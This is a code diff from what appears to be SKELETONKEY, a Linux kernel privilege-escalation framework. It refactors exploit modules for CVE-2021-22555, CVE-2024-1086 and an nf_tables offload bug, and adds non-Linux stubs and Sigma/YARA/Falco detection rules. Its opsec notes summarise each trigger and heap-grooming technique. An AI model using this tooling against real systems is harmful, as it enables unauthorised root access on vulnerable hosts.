+void skeletonkey_register_mutagen_astronomy(void)
+{
+    skeletonkey_register(&mutagen_astronomy_module);
+}
@@ -0,0 +1,5 @@
+#ifndef MUTAGEN_ASTRONOMY_SKELETONKEY_MODULES_H
+#define MUTAGEN_ASTRONOMY_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module mutagen_astronomy_module;
+#endif
@@ -58,16 +58,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdint.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -76,8 +81,6 @@
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <sys/stat.h>
-
-#ifdef __linux__
 #include <sys/ipc.h>
 #include <sys/msg.h>
 #include <sys/syscall.h>
@@ -91,31 +94,6 @@
 #ifndef SOL_IP
 #define SOL_IP  0
 #endif
-#endif
-
-/* ---------- macOS / non-linux build stubs ---------------------------
- * SKELETONKEY modules are dev-built on macOS (clangd / syntax check) and
- * run-built on Linux. The Linux-only types and IPT_SO_SET_REPLACE
- * constants are absent on Darwin; stub them so the .c file compiles
- * cleanly under either toolchain. The actual exploit body is gated
- * by `#ifdef __linux__` at runtime entry. */
-#ifndef __linux__
-#define CLONE_NEWUSER       0x10000000
-#define CLONE_NEWNET        0x40000000
-#define IPPROTO_RAW         255
-#define SOL_IP              0
-#define IPT_SO_SET_REPLACE  64
-struct ipt_replace { char dummy; };
-__attribute__((unused)) static int    msgget(int a, int b)             { (void)a;(void)b; errno=ENOSYS; return -1; }
-__attribute__((unused)) static int    msgsnd(int a, const void *b, size_t c, int d) { (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; }
-__attribute__((unused)) static ssize_t msgrcv(int a, void *b, size_t c, long d, int e) { (void)a;(void)b;(void)c;(void)d;(void)e; errno=ENOSYS; return -1; }
-__attribute__((unused)) static int    msgctl(int a, int b, void *c)    { (void)a;(void)b;(void)c; errno=ENOSYS; return -1; }
-#define IPC_PRIVATE   0
-#define IPC_CREAT     01000
-#define IPC_NOWAIT    04000
-#define IPC_RMID      0
-#define MSG_COPY      040000
-#endif

 /* ---- Kernel range ------------------------------------------------- */

@@ -139,53 +117,44 @@ static const struct kernel_range netfilter_xtcompat_range = {

 /* ---- Detect ------------------------------------------------------- */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static skeletonkey_result_t netfilter_xtcompat_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] netfilter_xtcompat: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] netfilter_xtcompat: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

-    if (v.major < 2 || (v.major == 2 && v.minor < 6)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 2, 6, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] netfilter_xtcompat: kernel %s predates the bug introduction\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&netfilter_xtcompat_range, &v);
+    bool patched = kernel_range_is_patched(&netfilter_xtcompat_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] netfilter_xtcompat: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] netfilter_xtcompat: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
        fprintf(stderr, "[i] netfilter_xtcompat: kernel %s in vulnerable range "
-                        "(bug existed since 2.6.19, 2006)\n", v.release);
+                        "(bug existed since 2.6.19, 2006)\n", v->release);
        fprintf(stderr, "[i] netfilter_xtcompat: user_ns+net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] netfilter_xtcompat: user_ns denied → "
                            "unprivileged exploit path unreachable\n");
@@ -202,8 +171,6 @@ static skeletonkey_result_t netfilter_xtcompat_detect(const struct skeletonkey_c

 /* ---- Exploit: userns reach + trigger + groom ---------------------- */

-#ifdef __linux__
-
 /* Write uid_map and gid_map after unshare so we're root in userns.
 * This is the standard setgroups=deny pattern; without it the uid_map
 * write is rejected on modern kernels for unprivileged callers. */
@@ -471,8 +438,6 @@ static int xtcompat_fire_trigger(int *out_errno)
    return 0;
 }

-#endif /* __linux__ — close original primitive block */
-
 /* ---- Full-chain arb-write primitive --------------------------------
 *
 * Pattern (FALLBACK — see module top-comment): the xt_compat 4-byte OOB
@@ -509,8 +474,6 @@ static int xtcompat_fire_trigger(int *out_errno)
 * patched kernel the trigger returns EINVAL on step 2 and arb_write
 * returns -1 without ever queueing the follow-up. */

-#ifdef __linux__
-
 struct xtcompat_arb_ctx {
    /* Spray queues kept hot across multiple arb_write calls. The
     * msg_msg slots seeded here are what the finisher uses as
@@ -636,15 +599,16 @@ static int xtcompat_arb_write(uintptr_t kaddr,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ---- Exploit driver ---------------------------------------------- */

 static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_ctx *ctx)
 {
    /* 1. Refuse-gate: re-confirm vulnerability through detect(). */
    skeletonkey_result_t pre = netfilter_xtcompat_detect(ctx);
-    if (pre == SKELETONKEY_OK && geteuid() == 0) {
+    /* Consult ctx->host first so unit tests can construct a non-root
+     * fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (pre == SKELETONKEY_OK && is_root) {
        fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -652,7 +616,7 @@ static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_
        fprintf(stderr, "[-] netfilter_xtcompat: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    if (is_root) {
        fprintf(stderr, "[i] netfilter_xtcompat: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -661,11 +625,6 @@ static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_
        return SKELETONKEY_PRECOND_FAIL;
    }

-#ifndef __linux__
-    fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
-    (void)ctx;
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early with the manual-
     * workflow help — no point doing the userns + spray + trigger
@@ -944,7 +903,6 @@ static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_
        fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */
@@ -963,6 +921,33 @@ static skeletonkey_result_t netfilter_xtcompat_cleanup(const struct skeletonkey_
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: setsockopt(IPT_SO_SET_REPLACE) + nfnetlink +
+ * userns is Linux-only kernel surface. Stub out cleanly so the module
+ * still registers and `--list` / `--detect-rules` work on macOS/BSD
+ * dev boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t netfilter_xtcompat_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] netfilter_xtcompat: Linux-only module "
+                "(xt_compat_target_to_user via SET_REPLACE) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t netfilter_xtcompat_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] netfilter_xtcompat: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t netfilter_xtcompat_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ---- Detection rules --------------------------------------------- */

 static const char netfilter_xtcompat_auditd[] =
@@ -975,6 +960,55 @@ static const char netfilter_xtcompat_auditd[] =
    "-a always,exit -F arch=b64 -S msgsnd -k skeletonkey-xtcompat-msgmsg\n"
    "-a always,exit -F arch=b64 -S msgrcv -k skeletonkey-xtcompat-msgmsg\n";

+static const char netfilter_xtcompat_sigma[] =
+    "title: Possible CVE-2021-22555 xt_compat OOB write\n"
+    "id: e67f90d5-skeletonkey-xtcompat\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects setsockopt(SOL_IP, IPT_SO_SET_REPLACE) from a non-root\n"
+    "  process inside unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by\n"
+    "  msg_msg grooming (msgsnd/msgrcv) and sendmmsg sk_buff spray.\n"
+    "  False positives: iptables config inside rootless containers /\n"
+    "  network namespaces. Correlate with privilege escalation\n"
+    "  (setresuid 0,0,0) to confirm.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:   {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  sso:      {type: 'SYSCALL', syscall: 'setsockopt', a1: 0}\n"
+    "  groom:    {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: userns and sso and groom\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2021.22555]\n";
+
+static const char netfilter_xtcompat_yara[] =
+    "rule netfilter_xtcompat_cve_2021_22555 : cve_2021_22555 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-22555\"\n"
+    "        description = \"xt_compat 4-byte OOB write log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-xtcompat.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char netfilter_xtcompat_falco[] =
+    "- rule: setsockopt IPT_SO_SET_REPLACE by non-root in userns\n"
+    "  desc: |\n"
+    "    Non-root process calls setsockopt(SOL_IP, IPT_SO_SET_REPLACE)\n"
+    "    from inside a userns with CAP_NET_ADMIN. The xt_compat\n"
+    "    target_to_user() handler writes past the xt_table_info\n"
+    "    allocation; CVE-2021-22555. False positives: iptables\n"
+    "    config in rootless containers.\n"
+    "  condition: >\n"
+    "    evt.type = setsockopt and not user.uid = 0\n"
+    "  output: >\n"
+    "    setsockopt SOL_IP by non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2021.22555]\n";
+
 const struct skeletonkey_module netfilter_xtcompat_module = {
    .name           = "netfilter_xtcompat",
    .cve            = "CVE-2021-22555",
@@ -986,9 +1020,11 @@ const struct skeletonkey_module netfilter_xtcompat_module = {
    .mitigate       = NULL,    /* mitigation: upgrade kernel; disable unprivileged_userns_clone */
    .cleanup        = netfilter_xtcompat_cleanup,
    .detect_auditd  = netfilter_xtcompat_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = netfilter_xtcompat_sigma,
+    .detect_yara    = netfilter_xtcompat_yara,
+    .detect_falco   = netfilter_xtcompat_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + setsockopt(SOL_IP, IPT_SO_SET_REPLACE) with a malformed xt_entry_target to trigger xt_compat_target_to_user 4-byte OOB into kmalloc-2k. msg_msg + sk_buff cross-cache groom. Writes /tmp/skeletonkey-xtcompat.log (breadcrumb). Audit-visible via unshare + setsockopt(IPT_SO_SET_REPLACE) + msgsnd/msgrcv + sendmmsg(sk_buff spray). Dmesg silent on success; KASAN oops if the groom misses. Cleanup callback unlinks the log; IPC auto-drains on namespace exit.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_netfilter_xtcompat(void)
@@ -57,16 +57,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -83,6 +88,7 @@
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"  /* shims for newer-kernel uapi constants */

 /* ------------------------------------------------------------------
 * Kernel-range table
@@ -90,7 +96,7 @@

 static const struct kernel_patched_from nf_tables_patched_branches[] = {
    {5,  4, 269},   /* 5.4.x */
-    {5, 10, 210},   /* 5.10.x */
+    {5, 10, 209},   /* 5.10.x (harmonised with Debian bullseye fix-version) */
    {5, 15, 149},   /* 5.15.x */
    {6,  1,  74},   /* 6.1.x */
    {6,  6,  13},   /* 6.6.x */
@@ -108,19 +114,6 @@ static const struct kernel_range nf_tables_range = {
 * Preconditions probe
 * ------------------------------------------------------------------ */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -136,44 +129,47 @@ static bool nf_tables_loaded(void)

 static skeletonkey_result_t nf_tables_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nf_tables: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] nf_tables: host fingerprint missing kernel "
+                            "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.14. Anything below predates it. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 14)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 14, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nf_tables: kernel %s predates the bug "
-                            "(introduced in 5.14)\n", v.release);
+                            "(introduced in 5.14)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nf_tables_range, &v);
+    bool patched = kernel_range_is_patched(&nf_tables_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nf_tables: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nf_tables: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nf_tables: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nf_tables: unprivileged user_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nf_tables: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload on first nft use)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nf_tables: kernel vulnerable but user_ns clone "
                            "denied → unprivileged exploit unreachable\n");
@@ -618,7 +614,6 @@ static long slabinfo_active(const char *slab)
 * Factored out so --full-chain can re-fire the trigger between
 * msg_msg sprays without duplicating the batch-building logic.
 * ------------------------------------------------------------------ */
-#ifdef __linux__
 static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
 {
    (void)cap;
@@ -792,7 +787,6 @@ static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vct
    usleep(20 * 1000);
    return 0;
 }
-#endif /* __linux__ */

 /* ------------------------------------------------------------------
 * The exploit body.
@@ -807,8 +801,11 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
        return pre;
    }

-    /* Gate 2: already root? Nothing to escalate. */
-    if (geteuid() == 0) {
+    /* Gate 2: already root? Nothing to escalate. Consult ctx->host first
+     * so unit tests can construct a non-root fingerprint regardless of
+     * the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nf_tables: already running as root\n");
        return SKELETONKEY_OK;
@@ -825,7 +822,6 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
        }
    }

-#ifdef __linux__
    /* --- --full-chain path --------------------------------------- *
     * Resolve offsets BEFORE doing anything destructive so we can
     * refuse cleanly on hosts where we have no modprobe_path. We run
@@ -906,7 +902,6 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
        close(sock);
        return r;
    }
-#endif

    /* --- primitive-only path: fork-isolated trigger -------------- *
     * Fork: child enters userns+netns and fires the bug. If the
@@ -1070,6 +1065,28 @@ static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
    return SKELETONKEY_EXPLOIT_FAIL;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: nfnetlink + nf_tables UAF + userns is
+ * Linux-only kernel surface. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t nf_tables_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] nf_tables: Linux-only module "
+                "(nft_verdict_init UAF via nfnetlink) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nf_tables_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] nf_tables: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 /* ----- Embedded detection rules ----- */

 static const char nf_tables_auditd[] =
@@ -1107,6 +1124,35 @@ static const char nf_tables_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2024.1086]\n";

+static const char nf_tables_yara[] =
+    "rule nf_tables_cve_2024_1086 : cve_2024_1086 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2024-1086\"\n"
+    "        description = \"nf_tables verdict-init UAF breadcrumb log\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-nft_set_uaf.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char nf_tables_falco[] =
+    "- rule: nf_tables verdict-init UAF batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root sendmsg on NETLINK_NETFILTER inside a userns,\n"
+    "    delivering an nfnetlink batch with NEWTABLE + NEWCHAIN +\n"
+    "    NEWSET (verdict-key) + NEWSETELEM with malformed NFT_GOTO\n"
+    "    committed twice. CVE-2024-1086 nft_verdict_init double-free.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2024.1086]\n";
+
 const struct skeletonkey_module nf_tables_module = {
    .name           = "nf_tables",
    .cve            = "CVE-2024-1086",
@@ -1119,8 +1165,10 @@ const struct skeletonkey_module nf_tables_module = {
    .cleanup        = NULL,
    .detect_auditd  = nf_tables_auditd,
    .detect_sigma   = nf_tables_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nf_tables_yara,
+    .detect_falco   = nf_tables_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE + NEWCHAIN/LOCAL_OUT + NEWSET verdict-key + NEWSETELEM malformed NFT_GOTO) committed twice to trigger the nft_verdict_init double-free. msg_msg cg-96 groom with forged pipapo_elem headers; --full-chain sprays kaddr-tagged forged elems and re-fires. Writes /tmp/skeletonkey-nft_set_uaf.log (conditional). Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg batches + msgget/msgsnd. Dmesg: KASAN double-free panic on vulnerable kernels; silent otherwise. Cleanup is finisher-gated; no persistent files on success.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_nf_tables(void)
@@ -43,16 +43,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -72,6 +77,7 @@
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"

 /* ------------------------------------------------------------------
 * Kernel range table — fixes per branch.
@@ -99,19 +105,6 @@ static const struct kernel_range nft_fwd_dup_range = {
 * Probes.
 * ------------------------------------------------------------------ */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -127,45 +120,43 @@ static bool nf_tables_loaded(void)

 static skeletonkey_result_t nft_fwd_dup_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nft_fwd_dup: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_fwd_dup: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* The offload code path only exists from 5.4 onward. Anything
     * older predates the bug. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 4)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 4, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nft_fwd_dup: kernel %s predates the bug "
-                            "(nft offload hook introduced in 5.4)\n", v.release);
+                            "(nft offload hook introduced in 5.4)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nft_fwd_dup_range, &v);
+    bool patched = kernel_range_is_patched(&nft_fwd_dup_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nft_fwd_dup: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nft_fwd_dup: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nft_fwd_dup: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nft_fwd_dup: unprivileged user_ns+net_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nft_fwd_dup: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nft_fwd_dup: kernel vulnerable but user_ns clone "
                            "denied → unprivileged path unreachable\n");
@@ -585,7 +576,6 @@ static int bring_lo_up(void)
    return 0;
 }

-#ifdef __linux__
 static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq)
 {
    size_t off = 0;
@@ -596,7 +586,6 @@ static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq)
    put_batch_end(batch, &off, (*seq)++);
    return off;
 }
-#endif

 /* ------------------------------------------------------------------
 * --full-chain arb-write context. The technique:
@@ -617,8 +606,6 @@ static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq)
 * mismatches as SKELETONKEY_EXPLOIT_FAIL rather than fake success.
 * ------------------------------------------------------------------ */

-#ifdef __linux__
-
 #define SPRAY_QUEUES_ARB        32

 struct fwd_arb_ctx {
@@ -721,8 +708,6 @@ static int nft_fwd_dup_arb_write(uintptr_t kaddr,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ------------------------------------------------------------------
 * Exploit driver.
 * ------------------------------------------------------------------ */
@@ -735,7 +720,8 @@ static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ct
        return SKELETONKEY_PRECOND_FAIL;
    }
    /* Gate 1: already root? */
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nft_fwd_dup: already running as root\n");
        return SKELETONKEY_OK;
@@ -748,11 +734,6 @@ static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ct
        return pre;
    }

-#ifndef __linux__
-    fprintf(stderr, "[-] nft_fwd_dup: linux-only exploit; non-linux build\n");
-    (void)ctx;
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    if (!ctx->json) {
        if (ctx->full_chain) {
            fprintf(stderr, "[*] nft_fwd_dup: --full-chain — trigger + OOB-write "
@@ -946,7 +927,6 @@ static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ct
        fprintf(stderr, "[-] nft_fwd_dup: unexpected child rc=%d\n", rc);
    }
    return SKELETONKEY_EXPLOIT_FAIL;
-#endif /* __linux__ */
 }

 /* ------------------------------------------------------------------
@@ -958,7 +938,6 @@ static skeletonkey_result_t nft_fwd_dup_cleanup(const struct skeletonkey_ctx *ct
    if (!ctx->json) {
        fprintf(stderr, "[*] nft_fwd_dup: cleaning up sysv queues + log\n");
    }
-#ifdef __linux__
    /* Best-effort drain of any leftover msg queues with IPC_PRIVATE
     * key owned by us. SysV doesn't enumerate by key, but msgctl
     * IPC_STAT walks /proc/sysvipc/msg to find them. */
@@ -979,13 +958,38 @@ static skeletonkey_result_t nft_fwd_dup_cleanup(const struct skeletonkey_ctx *ct
        }
        fclose(f);
    }
-#endif
    if (unlink("/tmp/skeletonkey-nft_fwd_dup.log") < 0 && errno != ENOENT) {
        /* harmless */
    }
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: nf_tables / NETLINK_NETFILTER / SysV msg_msg
+ * groom — all Linux-only kernel surface. Stub out so the module still
+ * registers and the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t nft_fwd_dup_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] nft_fwd_dup: Linux-only module "
+                "(nf_tables HW-offload OOB) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_fwd_dup_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] nft_fwd_dup: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_fwd_dup_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
